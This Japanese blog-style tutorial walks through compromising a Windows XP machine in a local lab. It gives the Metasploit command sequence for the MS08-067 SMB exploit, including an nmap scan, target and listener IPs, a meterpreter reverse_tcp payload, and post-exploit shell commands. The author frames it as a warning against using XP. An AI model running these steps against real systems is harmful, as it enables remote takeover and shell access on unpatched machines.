はじめに

この記事はXPを例としてハックしますが奨励してるわけではありません。逆に今でもXP使ってる人に見せてこんなに簡単にハックされるんだよってことを知らせて、XPの使用を減らしてもらいたいと考えての記事となります。

またこれはyoutubeの動画を参照しつつ、自分でやってみた結果です。英語雑魚なのでこの意味違うぞってのがあれば遠慮なく突っ込んでもらえるとありがたいです。

準備・環境

当然ですがXPをインターネットにつなげると危険なので,ローカル環境で行います。 kali linux
ip:192.168.0.3
Windows XP
ip:192.168.0.2

自分で試す人はこれから先のipは自分の環境のipに読みかえてください

ポートの確認

まずはポートの確認をします。exploitができるのは445ポートのmicrosoft-dsなのでそのポートが開いていることを以下のコマンドで確認します。

nmap -n -sV 192.168.0.2

445/tcp openと表示されればokです。表示されてない場合はポート開放されていないので「コントロールパネル」→「ファイアーウォールの設定」から「ファイルとプリンタの共有」のところのポートを開放してください

参考:ポート開放について

metasploitの利用

msfconsoleを開く

msfconsoleを開きます。kali linuxの場合はターミナルで

msfconsole

とたたくか、「アプリケーション」→「Kali Linux」→「Exploitation Tools」→「Metasploit」→「metasploit framework」を選択するとmsfconsoleが開きます。

useコマンドを使う

useコマンドはexploit対象を決める(言葉があってるか自信がない) なのでまず対象を決めます。今回は対象がsmbなのでsmbをキーワードとして検索をかけてみます。

msf > search name: smb

すると対象がたくさん出てくると思います。今回は /exploit/windows/smb/ms08_067_netapi というのを対象とします。

そうしたらinfoコマンドで情報を見ます。

msf > info exploit/windows/smb/ms08_067_netapi

そうすると対象だったりなどの情報が見られます。そうしたらuseコマンドを使います

msf > use exploit/windows/smb/ms08_067_netapi

すると以下のようにコンソールが変化します。

msf exploit(ms08_067_netapi) >

この状態でshow optionsとたたくとオプションが見れます。

攻撃対象の選択

この後は次のようにコマンドを打っていきます

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.2

RHOST => 192.168.0.2

msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3

LHOST => 192.168.0.3

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

RHOSTは攻撃対象、つまりwindowsxpのipアドレス

LHOSTは今の自分のマシンのipアドレスをsetします

PAYLOADはreverse_tcpを設定します。

これで準備は完了です

exploit

msf exploit(ms08_067_netapi) > exploit

上記を実行すると

meterpreter >

となりハックすることができます。ここで使えるコマンドは

sysinfo:システムの情報を見る
ipconfig:ネットワークの情報を見る
shell:シェルを起動する

などができます。(だいぶ脅威だよね)

おわりに

今回windowsxpをハックしましたが、かかった時間はなんと2時間くらい。そのうちローカルネットワークの構築が1時間50分くらい。
(ipの固定がうまくいかなかったり,windowsxpはデフォルトでpingを返さない仕様だしみたいなもろもろの静で時間がかかってた)
環境を構築する必要のない実際の攻撃の場合はxpのipがわかってしまえばものの10分かからずハックができてしまいます。

xpは使わないようにしましょうね.....